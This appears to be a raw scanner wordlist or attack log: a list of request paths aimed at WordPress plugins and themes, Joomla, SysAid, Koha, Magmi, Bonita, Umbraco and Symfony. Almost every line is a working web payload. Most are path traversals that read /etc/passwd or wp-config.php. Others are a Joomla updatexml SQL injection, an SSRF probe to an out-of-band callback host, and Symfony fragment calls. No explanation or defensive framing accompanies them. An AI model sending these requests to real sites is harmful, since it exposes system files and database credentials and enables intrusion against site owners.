/wlsecurity.html
/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd
/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
/wp-admin/tools.php?content=&wp-attachment-export-download=true
/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd
/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd
/login/../../../etc/passwd
/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)
/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}
/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/app_dev.php/_fragment?_path=_controller=phpcredits&flag=-1
/web/_fragment?_path=_controller=phpcredits&flag=-1
/app/_fragment?_path=_controller=phpcredits&flag=-1
/_fragment?_path=_controller=phpcredits&flag=-1
/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini
/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)
/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/cgibin/webproc
/wp-content/themes/mTheme-Unus/style.css
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
